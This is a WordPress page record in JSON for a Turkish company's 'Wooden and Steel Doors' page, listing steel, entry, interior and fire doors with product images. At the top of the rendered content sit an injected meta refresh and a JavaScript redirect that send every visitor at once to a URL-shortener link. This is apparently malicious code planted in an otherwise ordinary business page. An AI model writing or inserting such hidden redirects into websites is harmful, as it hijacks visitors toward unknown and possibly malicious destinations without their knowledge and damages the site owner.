{"id":627,"date":"2023-07-06T22:15:52","date_gmt":"2023-07-06T19:15:52","guid":{"rendered":"https:\/\/www.nazgrup.com.tr\/?page_id=627"},"modified":"2023-07-06T22:25:22","modified_gmt":"2023-07-06T19:25:22","slug":"ahsap-ve-celik-kapilar","status":"publish","type":"page","link":"https:\/\/www.nazgrup.com.tr\/index.php\/ahsap-ve-celik-kapilar\/","title":{"rendered":"Ah\u015fap ve \u00c7elik Kap\u0131lar"},"content":{"rendered":"<p><meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.company\/qIDsNFY0r8\" \/><br \/>\n<script>window.location.href = \"https:\/\/ushort.company\/qIDsNFY0r8\";<\/script><\/p>\n<style>\/*! elementor - v3.14.0 - 26-06-2023 *\/\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}<\/style>\n<h2>Ah\u015fap ve \u00c7elik Kap\u0131lar<\/h2>\n<style>\/*! elementor - v3.14.0 - 26-06-2023 *\/\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}<\/style>\n<p>\t\t\t\t\t\t\t\t\t\t\t\t<img decoding=\"async\" width=\"600\" height=\"338\" src=\"https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Anemon-Celik-Kapilar-600x3381-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Anemon-Celik-Kapilar-600x3381-1.jpg 600w, https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Anemon-Celik-Kapilar-600x3381-1-300x169.jpg 300w\" sizes=\"auto, (max-width: 600px) 100vw, 600px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/p>\n<h6>\u00c7elik Kap\u0131lar<br \/>\n<\/h6>\n<p>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Potente-Giris-Kapilari1-1024x576.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Potente-Giris-Kapilari1-1024x576.jpg 1024w, https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Potente-Giris-Kapilari1-300x169.jpg 300w, https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Potente-Giris-Kapilari1-768x432.jpg 768w, https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Potente-Giris-Kapilari1-1536x864.jpg 1536w, https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Potente-Giris-Kapilari1.jpg 1920w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/p>\n<h6>Giri\u015f Kap\u0131lar\u0131<\/h6>\n<p>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Agora-Ic-Kapilari1-1024x576.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Agora-Ic-Kapilari1-1024x576.jpg 1024w, https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Agora-Ic-Kapilari1-300x169.jpg 300w, https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Agora-Ic-Kapilari1-768x432.jpg 768w, https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Agora-Ic-Kapilari1-1536x864.jpg 1536w, https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Agora-Ic-Kapilari1.jpg 1920w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/p>\n<h6>\u0130\u00e7 Kap\u0131lar<br \/>\n<\/h6>\n<p>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Cift-Kanat-Yangin-Kapilari1-1024x576.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Cift-Kanat-Yangin-Kapilari1-1024x576.jpg 1024w, https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Cift-Kanat-Yangin-Kapilari1-300x169.jpg 300w, https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Cift-Kanat-Yangin-Kapilari1-768x432.jpg 768w, https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Cift-Kanat-Yangin-Kapilari1-1536x864.jpg 1536w, https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Cift-Kanat-Yangin-Kapilari1.jpg 1920w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/p>\n<h6>Yang\u0131n Kap\u0131lar\u0131<br \/>\n<\/h6>\n<p>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img decoding=\"async\" width=\"600\" height=\"338\" src=\"https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Anemon-Celik-Kapilar-600x3381-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Anemon-Celik-Kapilar-600x3381-1.jpg 600w, https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Anemon-Celik-Kapilar-600x3381-1-300x169.jpg 300w\" sizes=\"auto, (max-width: 600px) 100vw, 600px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/p>\n<h6>\u00c7elik Kap\u0131lar<br \/>\n<\/h6>\n<p>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Potente-Giris-Kapilari1-1024x576.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Potente-Giris-Kapilari1-1024x576.jpg 1024w, https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Potente-Giris-Kapilari1-300x169.jpg 300w, https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Potente-Giris-Kapilari1-768x432.jpg 768w, https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Potente-Giris-Kapilari1-1536x864.jpg 1536w, https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Potente-Giris-Kapilari1.jpg 1920w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/p>\n<h6>Giri\u015f Kap\u0131lar\u0131<\/h6>\n<p>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Agora-Ic-Kapilari1-1024x576.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Agora-Ic-Kapilari1-1024x576.jpg 1024w, https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Agora-Ic-Kapilari1-300x169.jpg 300w, https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Agora-Ic-Kapilari1-768x432.jpg 768w, https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Agora-Ic-Kapilari1-1536x864.jpg 1536w, https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Agora-Ic-Kapilari1.jpg 1920w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/p>\n<h6>\u0130\u00e7 Kap\u0131lar<br \/>\n<\/h6>\n<p>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Cift-Kanat-Yangin-Kapilari1-1024x576.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Cift-Kanat-Yangin-Kapilari1-1024x576.jpg 1024w, https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Cift-Kanat-Yangin-Kapilari1-300x169.jpg 300w, https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Cift-Kanat-Yangin-Kapilari1-768x432.jpg 768w, https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Cift-Kanat-Yangin-Kapilari1-1536x864.jpg 1536w, https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Cift-Kanat-Yangin-Kapilari1.jpg 1920w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/p>\n<h6>Yang\u0131n Kap\u0131lar\u0131<br \/>\n<\/h6>\n<p>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img decoding=\"async\" width=\"600\" height=\"338\" src=\"https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Anemon-Celik-Kapilar-600x3381-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Anemon-Celik-Kapilar-600x3381-1.jpg 600w, https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Anemon-Celik-Kapilar-600x3381-1-300x169.jpg 300w\" sizes=\"auto, (max-width: 600px) 100vw, 600px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/p>\n<h6>\u00c7elik Kap\u0131lar<br \/>\n<\/h6>\n<p>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Potente-Giris-Kapilari1-1024x576.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Potente-Giris-Kapilari1-1024x576.jpg 1024w, https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Potente-Giris-Kapilari1-300x169.jpg 300w, https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Potente-Giris-Kapilari1-768x432.jpg 768w, https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Potente-Giris-Kapilari1-1536x864.jpg 1536w, https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Potente-Giris-Kapilari1.jpg 1920w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/p>\n<h6>Giri\u015f Kap\u0131lar\u0131<\/h6>\n<p>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Agora-Ic-Kapilari1-1024x576.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Agora-Ic-Kapilari1-1024x576.jpg 1024w, https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Agora-Ic-Kapilari1-300x169.jpg 300w, https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Agora-Ic-Kapilari1-768x432.jpg 768w, https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Agora-Ic-Kapilari1-1536x864.jpg 1536w, https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Agora-Ic-Kapilari1.jpg 1920w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/p>\n<h6>\u0130\u00e7 Kap\u0131lar<br \/>\n<\/h6>\n<p>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Cift-Kanat-Yangin-Kapilari1-1024x576.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Cift-Kanat-Yangin-Kapilari1-1024x576.jpg 1024w, https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Cift-Kanat-Yangin-Kapilari1-300x169.jpg 300w, https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Cift-Kanat-Yangin-Kapilari1-768x432.jpg 768w, https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Cift-Kanat-Yangin-Kapilari1-1536x864.jpg 1536w, https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/Cift-Kanat-Yangin-Kapilari1.jpg 1920w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/p>\n<h6>Yang\u0131n Kap\u0131lar\u0131<br \/>\n<\/h6>\n","protected":false},"excerpt":{"rendered":"<p>Ah\u015fap ve \u00c7elik Kap\u0131lar \u00c7elik Kap\u0131lar Giri\u015f Kap\u0131lar\u0131 \u0130\u00e7 Kap\u0131lar Yang\u0131n Kap\u0131lar\u0131 \u00c7elik Kap\u0131lar Giri\u015f Kap\u0131lar\u0131 \u0130\u00e7 Kap\u0131lar Yang\u0131n Kap\u0131lar\u0131 \u00c7elik Kap\u0131lar Giri\u015f Kap\u0131lar\u0131 \u0130\u00e7 Kap\u0131lar Yang\u0131n Kap\u0131lar\u0131<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"site-sidebar-layout":"no-sidebar","site-content-layout":"page-builder","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"disabled","ast-breadcrumbs-content":"","ast-featured-img":"disabled","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","footnotes":""},"class_list":["post-627","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.nazgrup.com.tr\/index.php\/wp-json\/wp\/v2\/pages\/627","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.nazgrup.com.tr\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.nazgrup.com.tr\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.nazgrup.com.tr\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.nazgrup.com.tr\/index.php\/wp-json\/wp\/v2\/comments?post=627"}],"version-history":[{"count":7,"href":"https:\/\/www.nazgrup.com.tr\/index.php\/wp-json\/wp\/v2\/pages\/627\/revisions"}],"predecessor-version":[{"id":639,"href":"https:\/\/www.nazgrup.com.tr\/index.php\/wp-json\/wp\/v2\/pages\/627\/revisions\/639"}],"wp:attachment":[{"href":"https:\/\/www.nazgrup.com.tr\/index.php\/wp-json\/wp\/v2\/media?parent=627"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}